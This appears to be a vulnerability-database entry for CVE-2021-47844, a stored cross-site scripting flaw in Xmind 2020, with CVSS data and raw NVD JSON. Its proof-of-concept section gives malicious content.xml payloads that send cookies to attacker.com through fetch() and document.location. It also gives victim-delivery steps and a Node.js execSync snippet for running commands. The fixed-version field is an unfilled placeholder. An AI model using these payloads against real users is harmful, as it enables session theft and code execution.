Security Vulnerability Report
CVE-2021-47844 CVSS 6.1 MEDIUM

CVE-2021-47844

Published: 2026-01-16 19:16:10
Last Modified: 2026-04-15 00:35:42

Description

Xmind 2020 contains a cross-site scripting vulnerability that allows attackers to inject malicious payloads into mind mapping files or custom headers. Attackers can craft malicious files with embedded JavaScript that execute system commands when opened, enabling remote code execution through mouse interactions or file opening.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Xmind 2020 < version number (official fixed version)
Xmind 2020: all versions are affected (prior to the official fix)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
XML
<!-- CVE-2021-47844 XSS PoC for Xmind 2020 -->
<!-- This PoC demonstrates persistent XSS in Xmind .xmind file -->
<!-- Method 1: Inject via XML content.xml in .xmind file -->
<!-- 1. Create a new .xmind file or unzip existing one -->
<!-- 2. Modify the content.xml file with the following payload -->
<topic id="topic1">
  <title><![CDATA[<script>alert('XSS - CVE-2021-47844')</script>]]></title>
  <notes>
    <plain-text><![CDATA[<img src=x onerror="alert(document.cookie)">]]></plain-text>
  </notes>
</topic>

<!-- Method 2: Using event handlers -->
<topic id="topic2">
  <title><![CDATA[<img src=x onerror='fetch("https://attacker.com/steal?c="+document.cookie)' >]]></title>
</topic>

<!-- Method 3: Custom header injection -->
<topic id="topic3">
  <custom-properties>
    <custom-property key="author">
      <script>document.location='https://attacker.com/log?data='+btoa(document.cookie)</script>
    </custom-property>
  </custom-properties>
</topic>

<!-- Steps to exploit: -->
<!-- 1. Create malicious .xmind file with payload above -->
<!-- 2. Share file with victim via email or file sharing -->
<!-- 3. When victim opens file in Xmind 2020, XSS executes -->
<!-- 4. Attacker can steal cookies, perform actions as victim -->

<!-- For RCE demonstration (if combined with other vulnerabilities): -->
<script>
// Attempt to execute commands via Node.js integration if available
if (typeof require !== 'undefined') {
  const { execSync } = require('child_process');
  execSync('calc.exe'); // Example: spawn calculator on Windows
}
</script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47844", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:10.183", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Xmind 2020 contains a cross-site scripting vulnerability that allows attackers to inject malicious payloads into mind mapping files or custom headers. Attackers can craft malicious files with embedded JavaScript that execute system commands when opened, enabling remote code execution through mouse interactions or file opening."}, {"lang": "es", "value": "Xmind 2020 contiene una vulnerabilidad de cross-site scripting que permite a los atacantes inyectar cargas útiles maliciosas en archivos de mapas mentales o encabezados personalizados. Los atacantes pueden crear archivos maliciosos con JavaScript incrustado que ejecutan comandos del sistema al abrirlos, lo que permite la ejecución remota de código a través de interacciones del ratón o la apertura de archivos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", 
"modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://imgur.com/a/t96Nxo5", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49827", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/xmind-persistent-cross-site-scripting", "source": "[email protected]"}, {"url": "https://www.xmind.net/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/xmind-persistent-cross-site-scripting", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}